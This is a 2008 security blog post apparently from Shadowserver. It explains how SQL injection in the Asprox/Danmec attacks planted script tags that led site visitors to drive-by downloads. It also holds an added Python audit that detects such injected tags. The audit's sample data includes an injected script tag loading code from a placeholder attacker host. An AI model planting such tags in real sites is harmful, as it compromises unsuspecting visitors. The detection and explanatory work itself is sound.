Saturday, 5 July 2008

SQL Injection, Redirects and Drive-By Downloads, Oh My...

It's been almost 2 months since Shadowserver first posted a bunch of information about large-scale SQL Injection attacks (deemed Asprox / Danmec) which have gained a lot of media coverage (as well as turning up quite the list of involved domains). Awareness is a good thing, in my book.

Since that time what has really surprised me in many of my day-to-day conversations is the number of people who don't understand the nature of the problem. People are saying they were compromised by SQL Injection, but when I dig a little deeper I find that what actually happened was some user went to somegoodsite.com and ended up compromised. If you're one of those people, this blog's for you...

Understanding the Danmec/Asprox Attacks

Basically, the attacker launches an SQL injection attack against somegoodsite.com. SQL injection attacks try to exploit trust relationships between web applications and the databases that support them in order to add, remove or modify data in those databases in ways that were never intended. In the case of the Danmec/Asprox attacks, the intent of the SQL injection is to add a single line of HTML code to the database so that somegoodsite.com will present it to every user who visits the site.

The injected code has been an HTML "script" tag, which is used to define a segment of code for your browser to run. The difference in the Asprox/Danmec attacks, though, is that the code segment to run is malicious javascript hosted at evilsite.net. This is called a drive-by download. The innocent user wasn't targeted directly by the attacker's SQL injection. Instead, the innocent user was harmlessly surfing the web during his 1 hour lunch break and got something more than he bargained for from somegoodsite.com.

Evilsite.net then looks at the information presented by the innocent user's system and determines that evilsite2.net is hosting an exploit that should be effective. Evilsite.net then issues an IFRAME redirect telling the innocent user's browser to contact evilsite2.net (all without any interaction from the innocent user). Finally, evilsite2.net provides a working exploit which compromises the innocent user's machine. These compromises can be in the form of keyloggers, botnets, backdoors, or any other nastiness an attacker can drum up. Since this exploit relies on the innocent user's web client downloading and executing the malicious code on its own, we call this a client-side attack.
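The first step of that chain leaves a footprint the site owner can look for: one stored text value now carries a script tag pointing at a host the site never referenced. The following audit is an added example, not code from the original post or from Shadowserver; it assumes a SQLite database with a constructed sample table, and uses the post's placeholder names evilsite.net and somegoodsite.com.

```python
import re
import sqlite3
from urllib.parse import urlparse

# <script ... src=URL> with the URL quoted or bare; the injected line in these
# attacks was exactly one such tag appended to a stored text value.
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)

def injected_scripts(text, trusted_hosts):
    """Hosts of external <script src> tags in text; relative and trusted hosts are skipped."""
    hosts = []
    for url in SCRIPT_SRC.findall(text or ""):
        host = urlparse(url).hostname
        if host and host.lower() not in trusted_hosts:
            hosts.append(host.lower())
    return hosts

def audit_database(conn, trusted_hosts):
    """Scan every string value in every table; return (table, column, rowid, host) tuples."""
    findings = []
    cur = conn.cursor()
    tables = [r[0] for r in cur.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        columns = [r[1] for r in cur.execute(f'PRAGMA table_info("{table}")')]
        for row in cur.execute(f'SELECT rowid, * FROM "{table}"').fetchall():
            rowid, values = row[0], row[1:]
            for column, value in zip(columns, values):
                if isinstance(value, str):
                    for host in injected_scripts(value, trusted_hosts):
                        findings.append((table, column, rowid, host))
    return findings

def build_sample_db():
    """Constructed sample: a catalogue table where one description carries the injected tag.
    evilsite.net and somegoodsite.com are the placeholder names from the post."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'See <a href="http://somegoodsite.com/w">details</a>');
        INSERT INTO products VALUES (2, 'Gadget', 'Gadget <script src="/js/tabs.js"></script>');
        INSERT INTO products VALUES (3, 'Gizmo', 'Gizmo<script src=http://evilsite.net/malicious.js></script>');
    """)
    return conn

def audit_sample():
    """Run the audit over the constructed sample, trusting only the site's own host."""
    return audit_database(build_sample_db(), {"somegoodsite.com"})
```

The site's own relative script and its own link are not reported; only the row whose description now loads script from the untrusted host is.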

So the moral of the story is that somegoodsite.com got compromised by SQL injection. Your users got compromised by redirects, drive-by-downloads and client-side attacks.

Posted July 5, 2008, by jason aka dn1nj4 at shadowserver dot org